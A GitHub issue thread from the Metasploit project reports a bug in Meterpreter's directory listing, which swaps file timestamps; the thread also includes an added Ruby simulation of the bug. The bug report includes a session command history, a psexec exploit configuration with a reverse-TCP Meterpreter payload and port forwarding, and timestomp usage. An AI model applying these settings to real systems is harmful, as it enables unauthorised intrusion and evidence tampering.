dir of directory not displaying file modified timestamps #15919

Closed
quantumburnz opened this issue Nov 29, 2021 · 5 comments
Assignees: smcintyre-r7
Labels: bug, confirmed (Issues confirmed by a committer)

Comments

quantumburnz commented Nov 29, 2021

Steps to reproduce

  1. dir a directory such as:
    dir "c:\Windows\System32\winevt\Logs"
    dir "c:\Windows\System32\LogFiles\Scm"
  2. Note the timestamps in the "Last modified" column
  3. dir an individual file in the directory that has been modified since creation
    dir "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
    dir "c:\Windows\System32\winevt\Logs\Security.evtx"
  4. Alternatively, review the output of timestomp -v
    timestomp -v "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
    timestomp -v "c:\Windows\System32\winevt\Logs\Security.evtx"
  5. Compare the modified times, and you'll notice they don't match; instead, the timestamps from the dir in step 1 correlate with the Accessed or Created times.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

meterpreter > sysinfo
Computer : REDACTED
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : REDACTED
Logged On Users : 2
Meterpreter : x64/windows

Example output and discrepancy

meterpreter > dir "c:\Windows\System32\LogFiles\Scm"
Listing: c:\Windows\System32\LogFiles\Scm
=========================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  20      fil   2009-07-14 00:06:38 -0500  521d1619-41b3-4344-9aef-046f98f949a5
100666/rw-rw-rw-  12      fil   2009-07-14 00:06:38 -0500  5c571bff-df7d-4678-8297-7a6e5833b2e3

meterpreter > timestomp -v "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
[*] Showing MACE attributes for c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3
Modified      : 2021-11-29 06:42:48 -0600
Accessed      : 2009-07-14 00:06:38 -0500
Created       : 2009-07-14 00:06:38 -0500
Entry Modified: 2021-11-29 06:42:48 -0600

meterpreter > dir "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
100666/rw-rw-rw-  12  fil  2021-11-29 06:42:48 -0600  c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3

Were you following a specific guide/tutorial or reading documentation?

N/A

Expected behavior

dir of directory should show proper modified timestamps

Current behavior

dir of directory appears to be showing Accessed or Created times

Metasploit version

Framework: 6.1.11-dev
Console : 6.1.11-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/ui/console]
ActiveModule=exploit/windows/local/current_user_psexec

[windows/local/current_user_psexec]
WfsDelay=10
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=true
SESSION=68
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
INTERNAL_ADDRESS=REDACTED
NAME=
DISPNAME=
TECHNIQUE=SMB
RHOSTS=REDACTED
KERBEROS=false
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=REDACTED
LPORT=8082
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=process
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
loglevel=3

History

The following commands were ran during the session and before this issue occurred:

563    sessions -K
564    jobs
565    sessions
566    sessions -K
567    sessions
568    jobs
569    sessions
570    sessions -i 65
571    sessions -i 66
572    sessions -i 65
573    sessions
574    jobs
575    sessions
576    search psexec
577    sessions -i 68
578    use exploit/windows/local/current_user_psexec
579    show options
580    set RHOSTS REDACTED
581    set SESSION 68
582    set TECHNIQUE SMB
583    jobs
584    set payload windows/x64/meterpreter/reverse_tcp
585    set lhost REDACTED
586    set lport 8081
587    show options
588    run
589    show advanced
590    sessions
591    set DisablePayloadHandler true
592    set INTERNAL_ADDRESS REDACTED
593    show options
594    run
595    sessions
596    sessions -i 72
597    sessions
598    sessions -i 68 -c "portfwd add -R -p 8082 -L 127.0.0.1 -l 8081"
599    sessions -h
600    sessions -i 68 -C "portfwd add -R -p 8082 -L 127.0.0.1 -l 8081"
601    show options
602    set LHOST REDACTED
603    set LPORT 8082
604    show options
605    run
606    sessions
607    sessions -i 70
608    version
609    `set loglevel 3
610    set loglevel 3
611    sessions -i 70
612    debug

Framework Errors

The following framework errors occurred before the issue occurred:

[11/29/2021 10:22:32] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The filename, directory name, or volume label syntax is incorrect.
[11/29/2021 10:22:47] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
[11/29/2021 10:23:26] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The filename, directory name, or volume label syntax is incorrect.
[11/29/2021 10:32:56] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
[11/29/2021 10:33:00] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: Access is denied.
[11/29/2021 10:34:28] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/REDACTED/fromTargets
[11/29/2021 10:34:44] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 10:34:59] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[11/29/2021 10:34:44] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `chdir'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `cmd_lcd'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[11/29/2021 10:34:59] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 10:34:59] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `chdir'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `cmd_lcd'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[11/29/2021 11:04:25] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[11/29/2021 11:05:24] [d(0)] core: HistoryManager.push_context name: :meterpreter
[11/29/2021 11:05:43] [d(0)] core: HistoryManager.pop_context name: :meterpreter

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.1.11-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

smcintyre-r7 self-assigned this Dec 7, 2021
smcintyre-r7 added the confirmed (Issues confirmed by a committer) label Dec 7, 2021

smcintyre-r7 (Contributor) commented:

Alright, yeah, I was able to reproduce this. The modified timestamp is different in the output of Meterpreter's dir command than it is in the output of the timestomp -v command. According to PowerShell (as validated through (Get-Item "file").LastWriteTime), timestomp is correct and dir is incorrect. I'll take a look and see if I can get a fix for this.

smcintyre-r7 (Contributor) commented:

Another interesting piece of behavior here is that the dir command is not even consistent with itself. If you run a dir on the directory, as I did in my previous comment, the result does not match timestomp or PowerShell, but if you run dir on the file itself, it does.

Notice the difference in the Last Modified timestamp for the two entries of Setup.evtx:

100666/rw-rw-rw-  130093056  fil   2020-02-26 15:09:20 -0500  Security.evtx
100666/rw-rw-rw-  1052672    fil   2020-02-26 15:09:31 -0500  Setup.evtx
100666/rw-rw-rw-  69632      fil   2020-02-26 12:11:06 -0500  State.evtx
100666/rw-rw-rw-  5312512    fil   2020-02-26 15:09:20 -0500  System.evtx
100666/rw-rw-rw-  1118208    fil   2020-02-26 15:09:20 -0500  Windows PowerShell.evtx
100666/rw-rw-rw-  69632      fil   2020-02-27 16:29:39 -0500  microsoft-windows-diagnosis-scripted%4operational.evtx

meterpreter > dir "c:\Windows\System32\winevt\Logs\Setup.evtx"
100666/rw-rw-rw-  1052672  fil  2021-12-03 18:15:52 -0500  c:\Windows\System32\winevt\Logs\Setup.evtx

quantumburnz (Author) commented:

@smcintyre-r7 - I experienced this as well. It seems the dir of an individual file is correct, but I suspect the dir of a directory shows each file's creation time instead of modified time.

smcintyre-r7 (Contributor) commented:

You're right, it's swapping the timestamps and I figured out why. When you run dir on a single file, it's actually just returning the stat which uses this function to unpack the stat buffer. When you run dir on a directory, it uses this other function to unpack the stat buffer. You can see that the order of the last 3 fields is different between the two. Finally for reference, Meterpreter uses this order for the fields.

Now that I know what the problem is, I just need to figure out what the "correct" order is based on the other Meterpreters and switch the one(s) that are incorrect to it.

Thanks for reporting this bug! I have everything I need to get it sorted out now.
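
The field-order mismatch described in the comment above, and the dir-versus-timestomp comparison from the original steps to reproduce, can be reproduced in isolation. The following Ruby is an added example, not Metasploit's or Meterpreter's code: it packs a constructed stat record, decodes it with two field orders that disagree on the last three timestamp fields (the single-file path agreeing with the sender, the directory-listing path not), and runs the cross-check a practitioner would want, comparing each file's listing mtime with its single-file stat mtime and reporting which other field the listing value actually equals. The wire layout (SENDER_ORDER, DIR_LIST_ORDER), the helper names, and the sample files are all assumptions made up for this example; Meterpreter's real stat buffer layout is not reproduced here.

```ruby
# Added example, not Metasploit/Meterpreter code. The wire layout below is
# HYPOTHETICAL: five little-endian uint32 fields. It only reproduces the class
# of bug in the issue (two decoders that disagree on the order of the last
# three timestamp fields), plus a cross-check that catches the swap.
require 'time'

# Order the (hypothetical) sender writes the fields in.
SENDER_ORDER = %i[mode size atime mtime ctime].freeze

# Decoder used for a single-file stat: agrees with the sender.
FILE_STAT_ORDER = SENDER_ORDER

# Decoder used for a directory listing: last three fields rotated,
# mirroring the "order of the last 3 fields is different" finding.
DIR_LIST_ORDER = %i[mode size ctime atime mtime].freeze

def pack_stat(fields)
  SENDER_ORDER.map { |k| fields.fetch(k) }.pack('V*')
end

# Decode with whatever order the caller *believes* the buffer uses.
def unpack_stat(buf, order)
  vals = buf.unpack('V*')
  raise ArgumentError, "expected #{order.size} fields, got #{vals.size}" unless vals.size == order.size
  order.zip(vals).to_h
end

# For each file, compare the listing's mtime with the per-file stat's mtime.
# Returns { name => field } where field is the stat field the listing's
# "mtime" actually equals (:atime or :ctime), or :unknown if none matches.
# Files whose three timestamps are identical cannot reveal the swap and are
# not reported, which is why an untouched file looks "correct" in both paths.
def find_swapped_mtimes(listing, per_file)
  listing.each_with_object({}) do |(name, l), out|
    f = per_file.fetch(name)
    next if l[:mtime] == f[:mtime]
    out[name] = %i[atime ctime].find { |k| f[k] == l[:mtime] } || :unknown
  end
end

# Constructed sample (not real files): one log rewritten long after creation,
# and one never touched since creation.
CREATED  = Time.utc(2009, 7, 14, 5, 6, 38).to_i
MODIFIED = Time.utc(2021, 11, 29, 12, 42, 48).to_i
SAMPLE = {
  'scm.log'   => { mode: 0o100666, size: 12, atime: CREATED, mtime: MODIFIED, ctime: CREATED },
  'untouched' => { mode: 0o100666, size: 20, atime: CREATED, mtime: CREATED,  ctime: CREATED },
}.freeze

# Simulate both code paths over the same wire bytes and run the cross-check.
# Returns [listing, per_file, swapped].
def demo(sample = SAMPLE)
  wire     = sample.transform_values { |f| pack_stat(f) }
  listing  = wire.transform_values { |b| unpack_stat(b, DIR_LIST_ORDER) }
  per_file = wire.transform_values { |b| unpack_stat(b, FILE_STAT_ORDER) }
  [listing, per_file, find_swapped_mtimes(listing, per_file)]
end

if __FILE__ == $PROGRAM_NAME
  listing, per_file, swapped = demo
  fmt = ->(t) { Time.at(t).utc.iso8601 }
  SAMPLE.each_key do |name|
    puts format('%-10s listing mtime=%s  stat mtime=%s  %s', name,
                fmt[listing[name][:mtime]], fmt[per_file[name][:mtime]],
                swapped[name] ? "listing shows #{swapped[name]}" : 'consistent')
  end
end
```

The practical takeaway for anyone relying on this version's directory listing during an engagement or a forensic review: a file that has never been modified since creation will look identical under both code paths, so the swap only surfaces on files with distinct timestamps, and the single-file dir (or timestomp -v) is the value to trust.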

quantumburnz (Author) commented:

Glad you tracked it down, thank you @smcintyre-r7 !
